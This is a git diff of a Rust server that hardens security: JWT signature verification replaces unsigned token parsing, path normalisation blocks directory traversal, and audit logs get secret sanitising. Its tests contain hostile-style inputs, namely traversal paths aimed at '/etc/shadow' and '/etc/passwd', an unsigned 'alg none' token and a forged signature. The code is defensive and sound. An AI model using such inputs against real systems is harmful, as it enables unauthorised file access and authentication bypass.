or ECDSA family — HMAC algorithms are rejected to prevent +//! `alg`-confusion attacks). +//! +//! # Production wiring +//! +//! Use [`build_validator`] at server startup to construct a single +//! [`OAuthValidator`] from a [`HttpOAuthConfig`]. The validator pre-loads +//! every signing key declared in `static_keys` and is shared across +//! requests as `Arc` via Axum extensions; the middleware +//! reads the shared instance instead of building a fresh empty validator +//! per request. `build_validator` returns `Err` when OAuth is enabled but +//! no key source is configured, so the server fails closed at boot +//! rather than rejecting every token. +//! +//! # Limitations +//! +//! JWKS HTTP fetching (`jwks_uri`) is not yet wired here: the `http` +//! feature does not pull in an HTTP client, so the configuration field is +//! reserved but currently rejected by `build_validator` with a clear +//! error. Until reqwest/hyper are piped through extensions, populate the +//! validator via `static_keys`. +use std::collections::HashMap; use std::sync::Arc; use axum::extract::Request; use axum::http::StatusCode; use axum::middleware::Next; use axum::response::{IntoResponse, Response}; +use jsonwebtoken::{Algorithm, DecodingKey, Validation, decode, decode_header}; use serde::{Deserialize, Serialize}; use serde_json::json; use tracing::{debug, warn}; @@ -35,6 +58,12 @@ pub struct OAuthConfig { /// Required scopes for access. #[serde(default)] pub required_scopes: Vec, + /// Static signing keys, keyed by `kid`. Populated from + /// [`crate::config::types::HttpOAuthConfig::static_keys`] at boot; + /// kept on the runtime config so [`build_validator`] can pre-load + /// the validator's key map. + #[serde(default)] + pub static_keys: Vec<(String, String)>, } /// Validated token claims extracted from a Bearer token. @@ -68,64 +97,154 @@ pub mod scopes { pub const ADMIN: &str = "mcp:admin"; } +/// Internal JWT claims layout deserialised from the verified token payload. +#[derive(Debug, Deserialize)] +struct JwtClaims { + #[serde(default)] + sub: Option, + iss: String, + /// `aud` may be a single string or an array per RFC 7519 §4.1.3. + /// `jsonwebtoken` validates it through [`Validation::set_audience`]; we + /// only need to deserialise it without rejecting either shape. + #[allow(dead_code)] + aud: serde_json::Value, + #[serde(default)] + scope: String, + #[allow(dead_code)] + exp: i64, + #[serde(default)] + #[allow(dead_code)] + nbf: Option, +} + /// OAuth validator that checks Bearer tokens. +/// +/// Tokens must be JWTs signed with one of the accepted asymmetric algorithms +/// (`RS256`/`RS384`/`RS512`, `ES256`/`ES384`, `PS256`/`PS384`/`PS512`). +/// HMAC algorithms (`HS*`) and `none` are rejected to prevent +/// `alg`-confusion attacks. +/// +/// Public keys are addressed by their JWK `kid`. Two key shapes are accepted: +/// - PEM-encoded RSA public key (PKCS#1 or `SubjectPublicKeyInfo`) +/// - `n.e` JWK components stored as `"."` (populated by +/// [`Self::refresh_jwks`]) pub struct OAuthValidator { config: OAuthConfig, + /// Public keys keyed by `kid`. Each value is either a PEM blob or the + /// `n.e` JWK components when populated by [`Self::refresh_jwks`]. + keys: HashMap, } impl OAuthValidator { - /// Create a new OAuth validator. + /// Create a new OAuth validator with no signing keys. + /// + /// Callers must populate keys via [`Self::set_static_keys`] or + /// [`Self::refresh_jwks`] before any token will be accepted. #[must_use] pub fn new(config: OAuthConfig) -> Self { - Self { config } + Self { + config, + keys: HashMap::new(), + } } - /// Validate a Bearer token string. + /// Replace the in-memory key map with the supplied `(kid, pem)` pairs. + pub fn set_static_keys(&mut self, keys: Vec<(String, String)>) { + self.keys = keys.into_iter().collect(); + } + + /// Number of signing keys currently loaded (mostly useful in tests). + #[must_use] + pub fn key_count(&self) -> usize { + self.keys.len() + } + + /// Replace the in-memory key map from a parsed JWKS document. /// - /// In a production implementation, this would verify JWT signatures - /// against JWKS keys. For now, it performs basic structural validation - /// and extracts claims from the JWT payload. - pub fn validate_token(&self, token: &str) -> Result { - // JWT format: header.payload.signature - let parts: Vec<&str> = token.split('.').collect(); - if parts.len() != 3 { - return Err("Invalid JWT format: expected 3 parts".to_string()); + /// The document must follow RFC 7517 (`{ "keys": [ { "kid": ..., "n": + /// ..., "e": ... } ] }`). The HTTP fetch is intentionally not bundled + /// here so the `http` feature does not pull in an HTTP client; callers + /// (or a follow-up that pipes `reqwest`/`hyper` through extensions) + /// fetch the document and pass the parsed JSON in. + /// + /// # Errors + /// Returns a string describing the parse failure. + pub fn load_jwks(&mut self, jwks: &serde_json::Value) -> Result<(), String> { + let mut keys = HashMap::new(); + for k in jwks["keys"].as_array().ok_or("jwks.keys not an array")? { + let kid = k["kid"].as_str().unwrap_or_default().to_string(); + let n = k["n"].as_str().ok_or("jwk.n missing")?; + let e = k["e"].as_str().ok_or("jwk.e missing")?; + keys.insert(kid, format!("{n}.{e}")); } + self.keys = keys; + Ok(()) + } - // Decode the payload (base64url) - let payload = - base64url_decode(parts[1]).map_err(|e| format!("Invalid JWT payload encoding: {e}"))?; - - let claims: serde_json::Value = serde_json::from_slice(&payload) - .map_err(|e| format!("Invalid JWT payload JSON: {e}"))?; - - // Validate issuer - if !self.config.issuer.is_empty() { - let iss = claims["iss"].as_str().unwrap_or_default(); - if iss != self.config.issuer { - return Err(format!( - "Invalid issuer: expected '{}', got '{iss}'", - self.config.issuer - )); - } + /// Validate a Bearer token string. + /// + /// Verifies the JWT signature against the configured public key map, + /// enforces `iss`/`aud`/`exp`/`nbf` (with 30s leeway) and the configured + /// `required_scopes`. Returns the extracted claims on success. + /// + /// # Errors + /// Returns a human-readable description of the first validation failure. + pub fn validate_token(&self, token: &str) -> Result { + // Decode the unverified header to learn the algorithm and key id. + let header = decode_header(token).map_err(|e| format!("Invalid JWT header: {e}"))?; + + // Reject HMAC and `none` algorithms to prevent alg-confusion attacks. + match header.alg { + Algorithm::RS256 + | Algorithm::RS384 + | Algorithm::RS512 + | Algorithm::ES256 + | Algorithm::ES384 + | Algorithm::PS256 + | Algorithm::PS384 + | Algorithm::PS512 => {} + other => return Err(format!("Algorithm '{other:?}' not accepted")), } - // Validate audience - if !self.config.audience.is_empty() { - let aud = claims["aud"].as_str().unwrap_or_default(); - if aud != self.config.audience { - return Err(format!( - "Invalid audience: expected '{}', got '{aud}'", - self.config.audience - )); - } - } + let kid = header + .kid + .ok_or_else(|| "JWT missing kid header".to_string())?; + let key_material = self + .keys + .get(&kid) + .ok_or_else(|| format!("Unknown JWT signing key: {kid}"))?; + + let decoding_key = if let Some((n, e)) = key_material.split_once('.') { + DecodingKey::from_rsa_components(n, e) + .map_err(|err| format!("Invalid JWKS RSA components: {err}"))? + } else { + DecodingKey::from_rsa_pem(key_material.as_bytes()) + .map_err(|err| format!("Invalid PEM signing key: {err}"))? + }; - // Extract scopes - let scopes_str = claims["scope"].as_str().unwrap_or_default(); - let scopes: Vec = scopes_str.split_whitespace().map(String::from).collect(); + let mut validation = Validation::new(header.alg); + validation.set_issuer(&[self.config.issuer.as_str()]); + validation.set_audience(&[self.config.audience.as_str()]); + // Explicitly require all four spec claims. `jsonwebtoken` 9.x only + // requires `exp` by default; without this line a token missing + // `sub` would pass validation. `iss`/`aud` enforcement is already + // implied by `set_issuer`/`set_audience` above, but listing them + // here keeps the contract explicit (FIND-007). + validation.set_required_spec_claims(&["exp", "sub", "iss", "aud"]); + validation.validate_exp = true; + validation.validate_nbf = true; + validation.leeway = 30; + + let data = decode::(token, &decoding_key, &validation) + .map_err(|e| format!("JWT validation failed: {e}"))?; + + let scopes: Vec = data + .claims + .scope + .split_whitespace() + .map(String::from) + .collect(); - // Check required scopes for required in &self.config.required_scopes { if !scopes.iter().any(|s| s == required) { return Err(format!("Missing required scope: {required}")); @@ -133,14 +252,95 @@ impl OAuthValidator { } Ok(TokenClaims { - sub: claims["sub"].as_str().unwrap_or_default().to_string(), - iss: claims["iss"].as_str().unwrap_or_default().to_string(), + sub: data.claims.sub.unwrap_or_default(), + iss: data.claims.iss, scopes, }) } } +/// Build an [`OAuthValidator`] from a YAML config: pre-populates static +/// keys so token validation succeeds at request time rather than per- +/// request constructing an empty key map. +/// +/// JWKS HTTP fetching is not yet wired here — see the module-level +/// "Limitations" section. When `jwks_uri` is configured but no static +/// keys are present, this function returns an explicit error rather +/// than silently building a validator that rejects every token. +/// +/// # Errors +/// Returns `Err` when OAuth is enabled but no usable key source is +/// configured, so the server fails closed at boot. +// Async because the FIND-006 follow-up will replace the +// `jwks_uri` rejection with an actual fetch (`reqwest`/`hyper`), +// and the public signature should not need to change again. +#[allow(clippy::unused_async)] +pub async fn build_validator( + cfg: &crate::config::types::HttpOAuthConfig, +) -> Result { + let runtime_cfg = OAuthConfig { + enabled: cfg.enabled, + issuer: cfg.issuer.clone(), + audience: cfg.audience.clone(), + jwks_uri: cfg.jwks_uri.clone(), + client_id: cfg.client_id.clone(), + required_scopes: cfg.required_scopes.clone(), + static_keys: cfg + .static_keys + .iter() + .map(|k| (k.kid.clone(), k.public_key_pem.clone())) + .collect(), + }; + + build_validator_from_runtime(&runtime_cfg).await +} + +/// Build an [`OAuthValidator`] from the runtime [`OAuthConfig`]. +/// +/// Used by the HTTP server start-up path, which already converts the +/// YAML config into the runtime shape before constructing +/// [`super::http::HttpTransportConfig`]. Same fail-closed semantics as +/// [`build_validator`]. +/// +/// # Errors +/// Returns `Err` when OAuth is enabled but no usable key source is +/// configured. +// See `build_validator` — async kept to absorb the FIND-006 follow-up +// (JWKS HTTP fetch) without breaking the public signature. +#[allow(clippy::unused_async)] +pub async fn build_validator_from_runtime(cfg: &OAuthConfig) -> Result { + let mut v = OAuthValidator::new(cfg.clone()); + + if !cfg.static_keys.is_empty() { + v.set_static_keys(cfg.static_keys.clone()); + } + + if cfg.jwks_uri.is_some() && v.key_count() == 0 { + return Err( + "oauth.jwks_uri configured but JWKS HTTP fetching is not yet wired; \ + configure oauth.static_keys for now (FIND-006 follow-up will pipe \ + reqwest through extensions)" + .into(), + ); + } + + if cfg.enabled && v.key_count() == 0 { + return Err( + "oauth.enabled=true but no static_keys (or supported jwks_uri) configured; \ + refusing to start with an empty key map" + .into(), + ); + } + + Ok(v) +} + /// Axum middleware that validates OAuth Bearer tokens. +/// +/// Reads the shared `Arc` installed by [`build_validator`] +/// from request extensions. When the validator extension is absent (server +/// misconfiguration) the request is rejected with HTTP 503 rather than +/// silently falling back to an empty key map. pub async fn oauth_middleware(request: Request, next: Next) -> Response { // Extract the OAuth config from extensions let config = request.extensions().get::>().cloned(); @@ -169,8 +369,13 @@ pub async fn oauth_middleware(request: Request, next: Next) -> Response { }; let token = token.trim(); - // Validate the token - let validator = OAuthValidator::new((*config).clone()); + // Read the boot-time validator from extensions. If it is missing the + // server was wired incorrectly — fail closed with 503 rather than + // building a fresh empty validator that rejects every token. + let Some(validator) = request.extensions().get::>().cloned() else { + warn!("OAuthValidator extension missing — server misconfigured"); + return service_unavailable("OAuth validator not configured on this server"); + }; match validator.validate_token(token) { Ok(claims) => { debug!(sub = %claims.sub, scopes = ?claims.scopes, "Token validated"); @@ -183,6 +388,17 @@ pub async fn oauth_middleware(request: Request, next: Next) -> Response { } } +fn service_unavailable(message: &str) -> Response { + ( + StatusCode::SERVICE_UNAVAILABLE, + axum::Json(json!({ + "error": "service_unavailable", + "message": message, + })), + ) + .into_response() +} + fn unauthorized(message: &str) -> Response { ( StatusCode::UNAUTHORIZED, @@ -194,63 +410,6 @@ fn unauthorized(message: &str) -> Response { .into_response() } -/// Decode a base64url-encoded string (no padding). -fn base64url_decode(input: &str) -> Result, String> { - // Replace URL-safe chars with standard base64 - let standard = input.replace('-', "+").replace('_', "/"); - - // Add padding - let padded = match standard.len() % 4 { - 2 => format!("{standard}=="), - 3 => format!("{standard}="), - _ => standard, - }; - - base64_decode_simple(&padded).map_err(|e| format!("base64 decode error: {e}")) -} - -/// Simple base64 decoder (avoids adding a base64 crate dependency). -#[allow(clippy::cast_possible_truncation)] -fn base64_decode_simple(input: &str) -> Result, &'static str> { - fn decode_char(c: u8) -> Result { - match c { - b'A'..=b'Z' => Ok(c - b'A'), - b'a'..=b'z' => Ok(c - b'a' + 26), - b'0'..=b'9' => Ok(c - b'0' + 52), - b'+' => Ok(62), - b'/' => Ok(63), - b'=' => Ok(0), - _ => Err("invalid base64 character"), - } - } - - let bytes = input.as_bytes(); - if !bytes.len().is_multiple_of(4) { - return Err("invalid base64 length"); - } - - let mut output = Vec::with_capacity(bytes.len() * 3 / 4); - - for chunk in bytes.chunks(4) { - let a = decode_char(chunk[0])?; - let b = decode_char(chunk[1])?; - let c = decode_char(chunk[2])?; - let d = decode_char(chunk[3])?; - - let triple = u32::from(a) << 18 | u32::from(b) << 12 | u32::from(c) << 6 | u32::from(d); - - output.push((triple >> 16) as u8); - if chunk[2] != b'=' { - output.push((triple >> 8) as u8); - } - if chunk[3] != b'=' { - output.push(triple as u8); - } - } - - Ok(output) -} - /// OAuth Authorization Server Metadata (RFC 8414). /// /// Returned by `GET /.well-known/oauth-authorization-server`. @@ -293,21 +452,6 @@ impl OAuthMetadata { mod tests { use super::*; - #[test] - fn test_base64url_decode() { - // "Hello" in base64url - let encoded = "SGVsbG8"; - let decoded = base64url_decode(encoded).unwrap(); - assert_eq!(String::from_utf8(decoded).unwrap(), "Hello"); - } - - #[test] - fn test_base64url_decode_with_padding() { - let encoded = "dGVzdA"; - let decoded = base64url_decode(encoded).unwrap(); - assert_eq!(String::from_utf8(decoded).unwrap(), "test"); - } - #[test] fn test_token_claims_has_scope() { let claims = TokenClaims { @@ -351,47 +495,228 @@ mod tests { let result = validator.validate_token("not-a-jwt"); assert!(result.is_err()); } +} + +#[cfg(test)] +mod jwt_verification_tests { + use super::*; + use base64::Engine; + use jsonwebtoken::{Algorithm, EncodingKey, Header, encode}; + use serde_json::json; + + fn priv_pem() -> &'static str { + include_str!("../../../tests/fixtures/oauth/test_priv.pem") + } + fn pub_pem() -> &'static str { + include_str!("../../../tests/fixtures/oauth/test_pub.pem") + } + + fn make_validator() -> OAuthValidator { + let cfg = OAuthConfig { + enabled: true, + issuer: "iss".to_string(), + audience: "aud".to_string(), + jwks_uri: None, + client_id: "test".to_string(), + required_scopes: vec!["mcp:tools:execute".to_string()], + static_keys: vec![], + }; + let mut v = OAuthValidator::new(cfg); + v.set_static_keys(vec![("kid-test".to_string(), pub_pem().to_string())]); + v + } + + fn sign_token(claims: &serde_json::Value) -> String { + let mut header = Header::new(Algorithm::RS256); + header.kid = Some("kid-test".to_string()); + encode( + &header, + claims, + &EncodingKey::from_rsa_pem(priv_pem().as_bytes()).unwrap(), + ) + .unwrap() + } #[test] - fn test_validate_token_valid_structure() { - let config = OAuthConfig::default(); - let validator = OAuthValidator::new(config); + fn rejects_token_with_invalid_signature() { + let v = make_validator(); + let now = chrono::Utc::now().timestamp(); + let claims = json!({ + "iss": "iss", "aud": "aud", "scope": "mcp:tools:execute", + "exp": now + 60, "iat": now, "sub": "alice", + }); + let valid = sign_token(&claims); + let mut parts: Vec = valid.split('.').map(String::from).collect(); + parts[2] = "AAAA".to_string(); + let forged = parts.join("."); + assert!(v.validate_token(&forged).is_err()); + } + + #[test] + fn rejects_alg_none() { + let v = make_validator(); + let header = base64::engine::general_purpose::URL_SAFE_NO_PAD + .encode(br#"{"alg":"none","kid":"kid-test"}"#); + let payload = base64::engine::general_purpose::URL_SAFE_NO_PAD + .encode(br#"{"iss":"iss","aud":"aud","scope":"mcp:tools:execute","exp":99999999999}"#); + let none_token = format!("{header}.{payload}."); + assert!(v.validate_token(&none_token).is_err()); + } - // Create a minimal JWT with base64url-encoded payload - let payload = serde_json::json!({ - "sub": "test-user", - "iss": "", - "aud": "", - "scope": "mcp:tools:read mcp:admin" + #[test] + fn rejects_expired_token() { + let v = make_validator(); + let claims = json!({ + "iss": "iss", "aud": "aud", "scope": "mcp:tools:execute", + "exp": 1_000_000, "iat": 999_000, "sub": "alice", }); - let payload_b64 = base64url_encode(&serde_json::to_vec(&payload).unwrap()); - let header_b64 = base64url_encode(b"{\"alg\":\"none\"}"); - let token = format!("{header_b64}.{payload_b64}.sig"); + let token = sign_token(&claims); + assert!(v.validate_token(&token).is_err()); + } - let claims = validator.validate_token(&token).unwrap(); - assert_eq!(claims.sub, "test-user"); - assert_eq!(claims.scopes.len(), 2); - assert!(claims.has_scope("mcp:tools:read")); + #[test] + fn rejects_wrong_issuer() { + let v = make_validator(); + let now = chrono::Utc::now().timestamp(); + let claims = json!({ + "iss": "evil", "aud": "aud", "scope": "mcp:tools:execute", + "exp": now + 60, "iat": now, "sub": "alice", + }); + let token = sign_token(&claims); + assert!(v.validate_token(&token).is_err()); } - #[allow(clippy::cast_possible_truncation)] - fn base64url_encode(data: &[u8]) -> String { - const CHARSET: &[u8] = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; - let mut result = String::new(); - for chunk in data.chunks(3) { - let b0 = chunk[0]; - let b1 = chunk.get(1).copied().unwrap_or(0); - let b2 = chunk.get(2).copied().unwrap_or(0); - let triple = u32::from(b0) << 16 | u32::from(b1) << 8 | u32::from(b2); - result.push(CHARSET[(triple >> 18) as usize & 63] as char); - result.push(CHARSET[(triple >> 12) as usize & 63] as char); - if chunk.len() > 1 { - result.push(CHARSET[(triple >> 6) as usize & 63] as char); - } - if chunk.len() > 2 { - result.push(CHARSET[triple as usize & 63] as char); - } - } - result.replace('+', "-").replace('/', "_") + #[test] + fn rejects_missing_scope() { + let v = make_validator(); + let now = chrono::Utc::now().timestamp(); + let claims = json!({ + "iss": "iss", "aud": "aud", "scope": "mcp:tools:read", + "exp": now + 60, "iat": now, "sub": "alice", + }); + let token = sign_token(&claims); + assert!(v.validate_token(&token).is_err()); + } + + #[test] + fn accepts_well_formed_token() { + let v = make_validator(); + let now = chrono::Utc::now().timestamp(); + let claims = json!({ + "iss": "iss", "aud": "aud", "scope": "mcp:tools:execute mcp:admin", + "exp": now + 600, "iat": now, "sub": "alice", + }); + let token = sign_token(&claims); + let claims = v.validate_token(&token).expect("valid token"); + assert_eq!(claims.sub, "alice"); + assert!(claims.scopes.iter().any(|s| s == "mcp:tools:execute")); + } + + #[tokio::test] + async fn build_validator_static_key_validates_token() { + use crate::config::types::{HttpOAuthConfig, HttpOAuthStaticKey}; + + let cfg = HttpOAuthConfig { + enabled: true, + issuer: "iss".into(), + audience: "aud".into(), + client_id: "test".into(), + required_scopes: vec!["mcp:tools:execute".into()], + jwks_uri: None, + static_keys: vec![HttpOAuthStaticKey { + kid: "kid-test".into(), + public_key_pem: pub_pem().into(), + }], + }; + + let v = super::build_validator(&cfg) + .await + .expect("validator built from static keys"); + assert_eq!(v.key_count(), 1); + + let now = chrono::Utc::now().timestamp(); + let claims = json!({ + "iss": "iss", "aud": "aud", "scope": "mcp:tools:execute", + "exp": now + 600, "iat": now, "sub": "bob", + }); + let token = sign_token(&claims); + let parsed = v.validate_token(&token).expect("valid token"); + assert_eq!(parsed.sub, "bob"); + } + + /// Build a JWT claims object with all four required spec claims + /// (`exp`, `sub`, `iss`, `aud`) populated, then remove the named claim + /// before signing. Used by the "missing required claim" tests below. + fn claims_omitting(name: &str) -> serde_json::Value { + let now = chrono::Utc::now().timestamp(); + let mut claims = json!({ + "iss": "iss", + "aud": "aud", + "scope": "mcp:tools:execute", + "exp": now + 600, + "iat": now, + "sub": "alice", + }); + claims + .as_object_mut() + .expect("claims is an object") + .remove(name); + claims + } + + #[test] + fn token_missing_sub_is_rejected() { + let v = make_validator(); + let token = sign_token(&claims_omitting("sub")); + assert!( + v.validate_token(&token).is_err(), + "token without `sub` claim must be rejected" + ); + } + + #[test] + fn token_missing_iss_is_rejected() { + let v = make_validator(); + let token = sign_token(&claims_omitting("iss")); + assert!( + v.validate_token(&token).is_err(), + "token without `iss` claim must be rejected" + ); + } + + #[test] + fn token_missing_aud_is_rejected() { + let v = make_validator(); + let token = sign_token(&claims_omitting("aud")); + assert!( + v.validate_token(&token).is_err(), + "token without `aud` claim must be rejected" + ); + } + + #[test] + fn token_missing_exp_is_rejected() { + let v = make_validator(); + let token = sign_token(&claims_omitting("exp")); + assert!( + v.validate_token(&token).is_err(), + "token without `exp` claim must be rejected" + ); + } + + #[tokio::test] + async fn build_validator_rejects_empty_when_enabled() { + use crate::config::types::HttpOAuthConfig; + + let cfg = HttpOAuthConfig { + enabled: true, + issuer: "iss".into(), + audience: "aud".into(), + client_id: "test".into(), + required_scopes: vec![], + jwks_uri: None, + static_keys: vec![], + }; + assert!(super::build_validator(&cfg).await.is_err()); } } diff --git a/src/path_utils.rs b/src/path_utils.rs new file mode 100644 index 00000000..6b16d67d --- /dev/null +++ b/src/path_utils.rs @@ -0,0 +1,115 @@ +//! Tilde-expansion helper. Replaces the archived `shellexpand` crate. +//! +//! `shellexpand` was archived upstream on 2026-02-25 and no longer +//! receives security patches. We only ever used `shellexpand::tilde` +//! (`~` and `~/...` expansion), so a thin `dirs::home_dir`-based +//! wrapper covers all real usage at the 9 call sites that remain in +//! the tree (CLI, config loader, SSH client, and three file-transfer +//! tool handlers). +//! +//! User-specific expansion (`~user/...`) is intentionally NOT +//! supported — the original `shellexpand::tilde` does not consult +//! `/etc/passwd` either, so this is a behaviour-preserving choice. + +use std::path::PathBuf; + +/// Replace a leading `~` with the user's home directory. +/// +/// Returns `Some()` for `~`, `Some(/rest)` for `~/rest`, +/// and `Some(input)` for everything else (relative paths, absolute +/// paths, and `~user/...` which we do not enumerate). Returns `None` +/// only when the input begins with `~`/`~/` *and* the OS cannot +/// resolve a home directory — extremely rare on real systems but +/// possible in stripped containers or embedded environments. +#[must_use] +pub fn home_expand(input: &str) -> Option { + if input == "~" { + return dirs::home_dir(); + } + if let Some(rest) = input.strip_prefix("~/") { + return dirs::home_dir().map(|h| h.join(rest)); + } + Some(PathBuf::from(input)) +} + +/// Convenience: home-expand then convert to a string. Lossy if the +/// resolved path contains non-UTF-8 bytes (very rare on modern +/// systems where home directories are UTF-8 paths). +#[must_use] +pub fn home_expand_string(input: &str) -> Option { + home_expand(input).map(|p| p.to_string_lossy().into_owned()) +} + +/// Best-effort variant: returns the expanded path as a `String`, +/// falling back to the input unchanged if home resolution fails. +/// +/// Use this in code paths that previously called +/// `shellexpand::tilde(p).to_string()` — `shellexpand` never failed, +/// so dropping it must not introduce a new error path. The fallback +/// matches the historical behaviour: if the home directory cannot be +/// resolved, the (non-expanded) input is passed through and the +/// downstream `Path::exists()` / `open()` will fail naturally with a +/// clear filesystem error. +#[must_use] +pub fn home_expand_or_input(input: &str) -> String { + home_expand_string(input).unwrap_or_else(|| input.to_string()) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn home_expand_replaces_leading_tilde() { + let home = std::env::var("HOME").expect("HOME must be set in test environment"); + assert_eq!( + home_expand("~/foo"), + Some(PathBuf::from(format!("{home}/foo"))) + ); + assert_eq!(home_expand("~"), Some(PathBuf::from(&home))); + } + + #[test] + fn home_expand_passes_through_absolute() { + assert_eq!(home_expand("/abs/path"), Some(PathBuf::from("/abs/path"))); + assert_eq!( + home_expand("relative/path"), + Some(PathBuf::from("relative/path")) + ); + } + + #[test] + fn home_expand_does_not_handle_user_specific() { + // `~bob/foo` is returned unchanged: we don't enumerate + // /etc/passwd, matching `shellexpand::tilde`'s own behaviour. + assert_eq!(home_expand("~bob/foo"), Some(PathBuf::from("~bob/foo"))); + } + + #[test] + fn home_expand_string_replaces_leading_tilde() { + let home = std::env::var("HOME").expect("HOME must be set in test environment"); + assert_eq!( + home_expand_string("~/foo").as_deref(), + Some(format!("{home}/foo").as_str()) + ); + } + + #[test] + fn home_expand_or_input_falls_back_on_unchanged_value() { + // For inputs without `~`, the helper is a no-op. + assert_eq!( + home_expand_or_input("/etc/ssh/sshd_config"), + "/etc/ssh/sshd_config" + ); + assert_eq!(home_expand_or_input("relative"), "relative"); + } + + #[test] + fn home_expand_or_input_expands_tilde_when_home_known() { + let home = std::env::var("HOME").expect("HOME must be set in test environment"); + assert_eq!( + home_expand_or_input("~/.ssh/id_ed25519"), + format!("{home}/.ssh/id_ed25519") + ); + } +} diff --git a/src/ports/tools.rs b/src/ports/tools.rs index dc73e29b..ec146549 100644 --- a/src/ports/tools.rs +++ b/src/ports/tools.rs @@ -20,6 +20,29 @@ use crate::ssh::SessionManager; use super::executor_router::ExecutorRouter; +/// Lexically normalize a POSIX-style absolute path: collapse `.`, `..`, +/// and repeated `/` without touching the filesystem. Output stays +/// absolute (leading `/`). Used by `validate_root_scope` so a path +/// `/root/../etc/passwd` resolves to `/etc/passwd` before the prefix +/// check rather than after. +fn normalize_path_lexical(path: &str) -> String { + let mut stack: Vec<&str> = Vec::new(); + for seg in path.split('/') { + match seg { + "" | "." => {} // empty (leading/trailing/double slash) or current + ".." => { + stack.pop(); + } + other => stack.push(other), + } + } + if stack.is_empty() { + "/".to_string() + } else { + format!("/{}", stack.join("/")) + } +} + /// Schema definition for a tool #[derive(Debug, Clone)] pub struct ToolSchema { @@ -306,15 +329,21 @@ impl ToolContext { } /// Check if a path is within the declared client roots. - /// Returns Ok if no roots are declared (backward compatible) or if the path matches a root. + /// Returns Ok if no roots are declared (backward compatible) or if the + /// lexically-normalized path is a descendant of a declared root. pub fn validate_root_scope(&self, path: &str) -> Result<()> { if self.roots.is_empty() { return Ok(()); } - // Extract path from file:// URIs in roots + let normalized = normalize_path_lexical(path); + for root in &self.roots { - let root_path = root.uri.strip_prefix("file://").unwrap_or(&root.uri); - if root_path == "/" || path == root_path || path.starts_with(&format!("{root_path}/")) { + let raw = root.uri.strip_prefix("file://").unwrap_or(&root.uri); + let root_norm = normalize_path_lexical(raw); + if root_norm == "/" + || normalized == root_norm + || normalized.starts_with(&format!("{root_norm}/")) + { return Ok(()); } } @@ -930,4 +959,41 @@ mod tests { .expect("must short-circuit and return without contacting the client"); assert_eq!(result.unwrap(), None); } + + #[test] + fn validate_root_scope_rejects_parent_traversal() { + let mut ctx = mock::create_test_context(); + ctx.roots = vec![root("file:///srv/app", None)]; + assert!( + ctx.validate_root_scope("/srv/app/../../etc/shadow") + .is_err() + ); + assert!( + ctx.validate_root_scope("/srv/app/foo/../../../etc/passwd") + .is_err() + ); + } + + #[test] + fn validate_root_scope_accepts_clean_descendant() { + let mut ctx = mock::create_test_context(); + ctx.roots = vec![root("file:///srv/app", None)]; + assert!(ctx.validate_root_scope("/srv/app/data/foo.txt").is_ok()); + assert!(ctx.validate_root_scope("/srv/app/data/./foo.txt").is_ok()); + } + + #[test] + fn validate_root_scope_no_roots_still_passes() { + let ctx = mock::create_test_context(); + assert!(ctx.validate_root_scope("/anywhere").is_ok()); + } + + #[test] + fn validate_root_scope_handles_root_with_trailing_slash() { + let mut ctx = mock::create_test_context(); + ctx.roots = vec![root("file:///srv/app/", None)]; + assert!(ctx.validate_root_scope("/srv/app/data").is_ok()); + assert!(ctx.validate_root_scope("/srv/app").is_ok()); + assert!(ctx.validate_root_scope("/srv/applications").is_err()); + } } diff --git a/src/security/audit.rs b/src/security/audit.rs index 1a75c631..34f609b0 100644 --- a/src/security/audit.rs +++ b/src/security/audit.rs @@ -1,5 +1,6 @@ use std::fs::{File, OpenOptions}; use std::io::Write; +use std::sync::Arc; use chrono::{DateTime, Utc}; use serde::Serialize; @@ -72,18 +73,27 @@ impl AuditEvent { pub struct AuditLogger { config: AuditConfig, sender: Option>, + sanitizer: Option>, } /// Background task that writes audit events to a file pub struct AuditWriterTask { rx: mpsc::UnboundedReceiver, file: File, + sanitizer: Option>, } impl AuditWriterTask { /// Run the writer task, consuming events from the channel pub async fn run(mut self) { - while let Some(event) = self.rx.recv().await { + while let Some(mut event) = self.rx.recv().await { + // Defensive: sanitize at the writer side too in case a logger + // sent us an event without sanitizing first. Belt-and-braces: + // when both sides share the same `Arc` we guarantee + // no secret ever lands in the JSONL file. + if let Some(ref s) = self.sanitizer { + event.command = s.sanitize(&event.command).into_owned(); + } if let Ok(json) = serde_json::to_string(&event) { let line = format!("{json}\n"); // Clone file handle for spawn_blocking @@ -121,10 +131,16 @@ impl AuditLogger { std::fs::create_dir_all(parent)?; } - let file = OpenOptions::new() - .create(true) - .append(true) - .open(&config.path)?; + let file = { + let mut opts = OpenOptions::new(); + opts.create(true).append(true); + #[cfg(unix)] + { + use std::os::unix::fs::OpenOptionsExt; + opts.mode(0o600); + } + opts.open(&config.path)? + }; // Create channel for async logging let (tx, rx) = mpsc::unbounded_channel(); @@ -132,26 +148,63 @@ impl AuditLogger { let logger = Self { config: config.clone(), sender: Some(tx), + sanitizer: None, }; - let task = AuditWriterTask { rx, file }; + let task = AuditWriterTask { + rx, + file, + sanitizer: None, + }; Ok((logger, Some(task))) } + /// Like `new` but applies a sanitizer to `event.command` before write/log. + /// + /// The same `Arc` is shared between the logger (for tracing + /// emission) and the writer task (for the JSONL file), so secrets are + /// masked on both sinks. + /// + /// # Errors + /// + /// Returns an error if the audit log file cannot be created or opened. + pub fn new_with_sanitizer( + config: &AuditConfig, + sanitizer: crate::security::Sanitizer, + ) -> std::io::Result<(Self, Option)> { + let (mut logger, task) = Self::new(config)?; + let san = Arc::new(sanitizer); + logger.sanitizer = Some(Arc::clone(&san)); + let task = task.map(|mut t| { + t.sanitizer = Some(san); + t + }); + Ok((logger, task)) + } + /// Create a disabled audit logger (for testing or when audit is off) #[must_use] pub fn disabled() -> Self { Self { config: AuditConfig::default(), sender: None, + sanitizer: None, } } /// Log an audit event (non-blocking) /// /// The event is sent to a background task for file writing. + /// If a sanitizer is configured, `event.command` is masked BEFORE the + /// tracing emission and BEFORE the channel send (so neither sink ever + /// sees the unredacted command). pub fn log(&self, event: AuditEvent) { + let mut event = event; + if let Some(ref s) = self.sanitizer { + event.command = s.sanitize(&event.command).into_owned(); + } + // Always log to tracing (fast, synchronous) Self::log_to_tracing(&event); @@ -631,7 +684,11 @@ mod tests { .unwrap(); let (tx, rx) = mpsc::unbounded_channel(); - let task = AuditWriterTask { rx, file }; + let task = AuditWriterTask { + rx, + file, + sanitizer: None, + }; // Send an event let event = AuditEvent::new( diff --git a/src/security/rbac.rs b/src/security/rbac.rs index 